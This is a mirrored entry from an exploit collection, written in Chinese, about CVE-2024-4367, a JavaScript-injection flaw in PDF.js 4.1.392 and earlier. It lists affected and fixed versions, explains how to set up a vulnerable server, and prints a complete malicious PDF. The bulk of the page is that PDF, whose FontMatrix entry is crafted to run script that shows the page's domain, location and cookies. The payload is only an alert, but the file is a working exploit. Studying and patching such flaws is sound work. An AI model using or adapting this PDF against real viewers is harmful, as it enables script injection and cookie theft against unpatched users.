admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-05-30 02:00:48 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/PDF.js 任意 JavaScript 代码执行 CVE-2024-4367.md

225 lines
3.9 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# PDF.js 任意 JavaScript 代码执行 CVE-2024-4367
## 漏洞描述
PDF.js 是 Mozilla 推出的一款开源 PDF 文件阅读器。其 4.1.392 版本及以前PDF.js 中存在一处 JavaScript 代码注入漏洞。
参考链接:
- https://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js/
- https://github.com/mozilla/pdf.js/archive/refs/tags/v4.1.392.zip
## 漏洞影响
影响版本:
```
v4.1.392 (released April 11, 2024): 受影响 (release before this bug was fixed)
v1.10.88 (released Oct 27, 2017): 受影响 (re-introduces the security vulnerability due to a typo fix)
v1.4.20 (released Jan 27, 2016): 受影响 (release before the next release that accidentally fixed the vulnerable code)
v0.8.1181 (released Apr 10, 2014): 受影响 (first public release of PDF.js)
```
安全版本:
```
v4.2.67 (released April 29, 2024): 不受影响 (fixed)
v1.9.426 (released Aug 15, 2017): 不受影响 (release before the next affected version)
v1.5.188 (released Apr 21, 2016): 不受影响 (mitigated the security vulnerability by an accidental typo)
```
## 环境搭建
Vulhub 执行如下命令启动一个使用了 PDF.js 4.1.392 的服务器:
```
docker compose up -d
```
服务启动后,访问`http://your-ip:8080`可以看到一个上传页面。
> 2024/05/27_15:30:25.85
> Vulhub 拉取镜像未成功,源码搭建环境:
```
wget https://github.com/mozilla/pdf.js/archive/refs/tags/v4.1.392.zip
unzip v4.1.392.zip
cd pdf.js-4.1.392
npm install -g gulp-cli@^2.3.0
npm install
gulp server
```
> vps 需要修改 `./pdf.js-4.1.392/test/webserver.mjs`,将 `localhost` 改为 `0.0.0.0`
```
this.host = host || "0.0.0.0";
```
## 漏洞复现
上传恶意PDF文件[poc.pdf](https://github.com/vulhub/vulhub/blob/master/pdfjs/CVE-2024-4367/poc.pdf)即可触发XSS弹窗。
![](images/PDF.js%20任意%20JavaScript%20代码执行%20CVE-2024-4367/image-20240527152556731.png)
## 漏洞POC
poc.pdf
```
%PDF-1.4
%
8 0 obj
<<
/PatternType 2
/Shading<<
/Function<<
/Domain[0 1]
/C0[0 0 1]
/C1[1 0.6 0]
/N 1
/FunctionType 2
>>
/ShadingType 2
/Coords[46 400 537 400]
/Extend[false false]
/ColorSpace/DeviceRGB
>>
/Type/Pattern
>>
endobj
5 0 obj
<<
/Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 573 0 573 0 341]
/Type/Font
/BaseFont/PAXEKO+SourceSansPro-Bold
/LastChar 102
/Encoding/WinAnsiEncoding
/FontMatrix [0.1 0 0 0.1 0 (1\); \nalert\('document.domain: '+window.document.domain+'\\nlocation: '+window.location+'\\ncookie: '+window.document.cookie)]
/Subtype/Type1
/FirstChar 65
/FontDescriptor 9 0 R
>>
endobj
2 0 obj
<<
/Kids[3 0 R]
/Type/Pages
/Count 1
>>
endobj
9 0 obj
<<
/Type/FontDescriptor
/ItalicAngle 0
/Ascent 751
/FontBBox[-6 -12 579 713]
/FontName/PAXEKO+SourceSansPro-Bold
/StemV 100
/CapHeight 713
/Flags 32
/FontFile3 10 0 R
/Descent -173
/MissingWidth 250
>>
endobj
6 0 obj
<<
/Length 128
>>
stream
47 379 489 230 re S
/Pattern cs
BT
50 500 Td
117 TL
/F1 150 Tf
/P1 scn
(AbCdEf) Tj
/P2 scn
(AbCdEf) '
ET
endstream
endobj
3 0 obj
<<
/Type/Page
/Resources 4 0 R
/Contents 6 0 R
/Parent 2 0 R
/MediaBox[0 0 595.2756 841.8898]
>>
endobj
10 0 obj
<<
/Length 800
/Subtype/Type2
>>
stream
endstream
endobj
7 0 obj
<<
/PatternType 1
/Matrix[1 0 0 1 50 0]
/Length 58
/TilingType 1
/BBox[0 0 16 16]
/YStep 16
/PaintType 1
/Resources<<
>>
/XStep 16
>>
stream
0.65 g
0 0 16 16 re f
0.15 g
0 0 8 8 re f
8 8 8 8 re f
endstream
endobj
4 0 obj
<<
/Pattern<<
/P1 7 0 R
/P2 8 0 R
>>
/Font<<
/F1 5 0 R
>>
>>
endobj
1 0 obj
<<
/Pages 2 0 R
/Type/Catalog
/OpenAction[3 0 R /Fit]
>>
endobj
xref
0 11
0000000000 65535 f
0000002260 00000 n
0000000522 00000 n
0000000973 00000 n
0000002178 00000 n
0000000266 00000 n
0000000794 00000 n
0000001953 00000 n
0000000015 00000 n
0000000577 00000 n
0000001085 00000 n
trailer
<<
/ID[(w4f) (w4f)]
/Root 1 0 R
/Size 11
>>
startxref
2333
%%EOF
```
Reference in New Issue Copy Permalink